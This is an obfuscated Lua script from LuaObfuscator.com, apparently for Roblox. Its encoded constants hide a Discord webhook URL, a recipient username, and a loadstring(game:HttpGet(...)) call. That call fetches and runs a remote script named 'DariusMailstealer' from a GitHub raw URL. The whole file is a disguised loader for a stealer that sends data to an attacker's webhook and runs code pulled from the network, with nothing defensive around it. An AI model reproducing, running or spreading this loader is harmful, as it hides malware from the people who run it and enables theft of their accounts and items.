--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.15) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v71=0 -0 ;local v72;while true do if (v71==(0 -0)) then v72=(v31/((3 -1)^(v32-(2 -1))))%(2^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -((1432 -(68 + 997)) + 201)))) ;return v72-(v72%(928 -(214 + 713))) ;end end else local v73=0 + 0 ;local v74;while true do if ((0 + 0)==v73) then v74=((2149 -(226 + 1044)) -(282 + 595))^(v32-(1638 -((6631 -5108) + 114))) ;return (((v31%(v74 + v74))>=v74) and (1 + 0)) or (0 -(117 -(32 + 85))) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 + 0 );v19=v19 + 1 + (4 -1) ;return (v37 * ((16778523 -(87 + 263)) -((1072 -(67 + 113)) + 65))) + (v36 * (156337 -90801)) + (v35 * (472 -216)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if ((1751 -(1013 + 736))~=v38) then else v43=nil;v44=nil;v38=3;end if (3~=v38) then else v45=nil;v46=nil;v38=4 + 0 ;end if (v38~=1) then else v41=nil;v42=nil;v38=2;end if ((0 -0)==v38) then v39=0;v40=nil;v38=1;end if (v38==4) then while true do if (v39~=0) then else local v99=0 -0 ;while true do if (v99~=1) then else v39=1;break;end if (v99==(867 -(550 + 317))) then v40=0 -0 ;v41=nil;v99=1;end end end if (v39==(3 -0)) then v46=nil;while true do local v103=0 -0 ;local v104;while true do if (v103==0) then v104=0;while true do if (v104==0) then local v112=285 -(134 + 151) ;while true do if (v112==0) then if (v40==3) then local v169=0;local v170;local v171;while true do if (1~=v169) then else while true do if (v170~=0) then else v171=1665 -(970 + 695) ;while true do if (v171==(0 -0)) then local v184=1990 -(582 + 1408) ;while true do if (0==v184) then for v190=3 -2 ,v24() do v42[v190-1 ]=v29();end return v44;end end end end break;end end break;end if (0==v169) then v170=0;v171=nil;v169=1 -0 ;end end end if ((7 -5)==v40) then local v172=0;local v173;while true do if (0~=v172) then else v173=0;while true do if (v173==(1825 -(1195 + 629))) then for v178=1,v24() do local v179=0;local v180;local v181;local v182;local v183;while true do if (v179~=0) then else v180=0 -0 ;v181=nil;v179=1;end if (v179==(243 -(187 + 54))) then while true do if (v180==(781 -(162 + 618))) then v183=nil;while true do if ((0 + 0)==v181) then local v194=0;while true do if (v194==(0 + 0)) then v182=0 -0 ;v183=nil;v194=1 -0 ;end if ((1 + 0)~=v194) then else v181=1;break;end end end if (1~=v181) then else while true do if (v182==0) then v183=v22();if (v21(v183,1637 -(1373 + 263) ,1)~=(1000 -(451 + 549))) then else local v195=0;local v196;local v197;local v198;local v199;while true do if (v195==(0 + 0)) then v196=0 -0 ;v197=nil;v195=1;end if ((1 -0)~=v195) then else v198=nil;v199=nil;v195=2;end if (v195==2) then while true do if (v196~=(1385 -(746 + 638))) then else v199={v23(),v23(),nil,nil};if (v197==(1581 -(1535 + 46))) then local v204=0 + 0 ;local v205;local v206;local v207;while true do if (0~=v204) then else v205=0;v206=nil;v204=1;end if (1==v204) then v207=nil;while true do if (v205~=0) then else local v216=0;while true do if (v216~=0) then else v206=0;v207=nil;v216=1;end if (v216~=1) then else v205=1 + 0 ;break;end end end if ((561 -(306 + 254))~=v205) then else while true do if (v206==0) then v207=0;while true do if (v207~=(0 + 0)) then else v199[5 -2 ]=v23();v199[1471 -(899 + 568) ]=v23();break;end end break;end end break;end end break;end end elseif (v197==1) then v199[3]=v24();elseif (v197==(2 + 0)) then v199[3]=v24() -((4 -2)^(619 -(268 + 335))) ;elseif (v197~=3) then else local v217=0;local v218;local v219;local v220;while true do if (0==v217) then v218=0;v219=nil;v217=1;end if (1==v217) then v220=nil;while true do if (v218==(290 -(60 + 230))) then local v223=572 -(426 + 146) ;while true do if (v223~=1) then else v218=1;break;end if (v223==(0 + 0)) then v219=0;v220=nil;v223=1;end end end if (v218==(1457 -(282 + 1174))) then while true do if (v219==0) then v220=0;while true do if (v220~=0) then else v199[3]=v24() -(2^16) ;v199[4]=v23();break;end end break;end end break;end end break;end end end v196=813 -(569 + 242) ;end if (v196~=(8 -5)) then else if (v21(v198,3,1 + 2 )~=1) then else v199[4]=v46[v199[1028 -(706 + 318) ]];end v41[v178]=v199;break;end if (v196~=0) then else local v201=0;local v202;while true do if (v201==0) then v202=0;while true do if (v202==1) then v196=1;break;end if (v202~=(1251 -(721 + 530))) then else v197=v21(v183,2,1274 -(945 + 326) );v198=v21(v183,4,14 -8 );v202=1 + 0 ;end end break;end end end if (v196==2) then local v203=0;while true do if (v203==(700 -(271 + 429))) then if (v21(v198,1,1 + 0 )==(1501 -(1408 + 92))) then v199[1088 -(461 + 625) ]=v46[v199[1290 -(993 + 295) ]];end if (v21(v198,2,1 + 1 )==(1172 -(418 + 753))) then v199[3]=v46[v199[3]];end v203=1 + 0 ;end if ((1 + 0)==v203) then v196=3;break;end end end end break;end end end break;end end break;end end break;end if (v180~=(0 + 0)) then else v181=0 + 0 ;v182=nil;v180=530 -(406 + 123) ;end end break;end if (v179~=(1770 -(1749 + 20))) then else v182=nil;v183=nil;v179=2;end end end v40=3;break;end if (v173~=(0 + 0)) then else local v177=1322 -(1249 + 73) ;while true do if (v177==1) then v173=1;break;end if (v177==0) then for v186=1 + 0 ,v45 do local v187=1145 -(466 + 679) ;local v188;local v189;while true do if (v187==(2 -1)) then if (v188==1) then v189=v22()~=(0 -0) ;elseif (v188==2) then v189=v25();elseif (v188==3) then v189=v26();end v46[v186]=v189;break;end if (v187~=(1900 -(106 + 1794))) then else local v193=0;while true do if ((0 + 0)==v193) then v188=v22();v189=nil;v193=1;end if (v193==(1 + 0)) then v187=2 -1 ;break;end end end end end v44[7 -4 ]=v22();v177=115 -(4 + 110) ;end end end end break;end end end v112=1;end if (1~=v112) then else v104=585 -(57 + 527) ;break;end end end if (v104==(1428 -(41 + 1386))) then if (v40==1) then local v125=103 -(17 + 86) ;local v126;while true do if (v125==0) then v126=0 + 0 ;while true do if (v126==0) then v44={v41,v42,nil,v43};v45=v24();v126=167 -(122 + 44) ;end if (v126==(1 -0)) then v46={};v40=2;break;end end break;end end end if (v40==(0 -0)) then local v127=0;local v128;while true do if (v127==0) then v128=0;while true do if (v128==0) then local v176=0 + 0 ;while true do if (v176==(0 + 0)) then v41={};v42={};v176=1 -0 ;end if (v176==1) then v128=66 -(30 + 35) ;break;end end end if (v128==1) then v43={};v40=1 + 0 ;break;end end break;end end end break;end end break;end end end break;end if (v39==(1259 -(1043 + 214))) then local v100=0 -0 ;local v101;while true do if (v100==0) then v101=0;while true do if (v101==(1213 -(323 + 889))) then v39=3;break;end if (v101==0) then v44=nil;v45=nil;v101=1;end end break;end end end if (v39==(2 -1)) then local v102=580 -(361 + 219) ;while true do if (v102~=(320 -(53 + 267))) then else v42=nil;v43=nil;v102=1 + 0 ;end if (1==v102) then v39=2;break;end end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=413 -(15 + 398) ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (((563 + 422) -((38 -20) + 964))==v47) then if (v52==(0 -0)) then if (v51==(0 + 0)) then return v53 * ((0 -0) + (0 -0)) ;else local v105=850 -(6 + 14 + 830) ;while true do if ((0 + 0)==v105) then v52=127 -(116 + 10) ;v50=0;break;end end end elseif (v52==(152 + 1895)) then return ((v51==(738 -(542 + 196))) and (v53 * ((1 -0)/(0 + 0)))) or (v53 * NaN) ;end return v8(v53,v52-(520 + 503) ) * (v50 + (v51/((1 + 1)^(136 -84)))) ;end if (v47==(2 -1)) then v50=1552 -(1126 + 425) ;v51=(v21(v49,406 -(118 + 287) ,78 -58 ) * (2^32)) + v48 ;v47=1123 -(118 + (4847 -3844)) ;end if (v47==(5 -3)) then v52=v21(v49,(1151 -(239 + 514)) -(142 + 83 + 152) ,140 -109 );v53=((v21(v49,7 + 25 )==(978 -(553 + 424))) and  -(1 -0)) or (1 + (1329 -(797 + 532))) ;v47=3 + 0 + 0 + 0 ;end if (v47==(0 + 0)) then v48=v24();v49=v24();v47=1 + (0 -0) ;end end end v26=nil;function v26(v54)local v55;if  not v54 then local v75=1202 -(373 + (1570 -741)) ;while true do if ((731 -(476 + 255))==v75) then v54=v24();if (v54==(1130 -(369 + 761))) then return "";end break;end end end v55=v3(v16,v19,(v19 + v54) -(1 + 0) );v19=v19 + v54 ;local v56={};for v69=1 -0 , #v55 do v56[v69]=v2(v1(v3(v55,v69,v69)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=0;local v58;while true do if (v57==(238 -(64 + 174))) then v58=v1(v16,v19,v19);v19=v19 + 1 ;v57=(337 -(144 + 192)) + 0 ;end if (v57==(1 -0)) then return v58;end end end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + 2 );v19=v19 + (218 -(42 + 174)) ;return (v60 * (193 + 63)) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v76=0;while true do if (v76==0) then v20=v0(v3(v61,1,1));return "";end end else local v77=v2(v0(v61,16));if v20 then local v81=0;local v82;while true do if (v81==0) then v82=v5(v77,v20);v20=nil;v81=1;end if (v81==1) then return v82;end end else return v77;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v83=v66;local v84=v67;local v85=v68;local v86=v28;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do local v98=0;while true do if (0==v98) then v95=v83[v87];v96=v95[1];v98=1;end if (v98==1) then if (v96<=4) then if (v96<=1) then if (v96>0) then local v113=0;local v114;local v115;while true do if (v113==5) then v95=v83[v87];v115=v95[2];v114=v93[v95[3]];v93[v115 + 1 ]=v114;v93[v115]=v114[v95[4]];v113=6;end if (v113==2) then v95=v83[v87];v64[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v113=3;end if (v113==6) then v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];break;end if (v113==1) then v64[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v113=2;end if (v113==0) then v114=nil;v115=nil;v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v113=1;end if (3==v113) then v87=v87 + 1 ;v95=v83[v87];v64[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];v113=4;end if (v113==4) then v93[v95[2]]=v64[v95[3]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v64[v95[3]];v87=v87 + 1 ;v113=5;end end else v93[v95[2]]=v64[v95[3]];end elseif (v96<=2) then v93[v95[2]]=v95[3];elseif (v96==3) then v64[v95[3]]=v93[v95[2]];else local v131=v95[2];local v132,v133=v86(v93[v131](v13(v93,v131 + 1 ,v95[3])));v88=(v133 + v131) -1 ;local v134=0;for v162=v131,v88 do local v163=0;while true do if (v163==0) then v134=v134 + 1 ;v93[v162]=v132[v134];break;end end end end elseif (v96<=6) then if (v96==5) then do return;end else local v120=v95[2];v93[v120]=v93[v120](v13(v93,v120 + 1 ,v88));end elseif (v96<=7) then local v122=0;local v123;local v124;while true do if (v122==0) then v123=v95[2];v124=v93[v95[3]];v122=1;end if (v122==1) then v93[v123 + 1 ]=v124;v93[v123]=v124[v95[4]];break;end end elseif (v96==8) then v93[v95[2]]=v95[3]~=0 ;else v93[v95[2]]();end v87=v87 + 1 ;break;end end end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!093O0003083O00557365724E616D65030E3O006F6E657069656365313233747A7803073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3134373230363931303731303338363730382F3276455471422O4E2O7A757346766B31755256796B7A564F7335444F5463676E58486A586F53317342334E323768705971304C75324862706F6879645765355A7061365F03093O00557365724E616D6532030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403523O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F50726F636F6465723534392F446172697573536372697074732F6D61696E2F4461726975734D61696C737465616C6572000F3O0012013O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00122O000100073O00202O00010001000800122O000300094O0008000400014O0004000100044O00065O00022O00093O000100012O00053O00017O00",v9(),...);
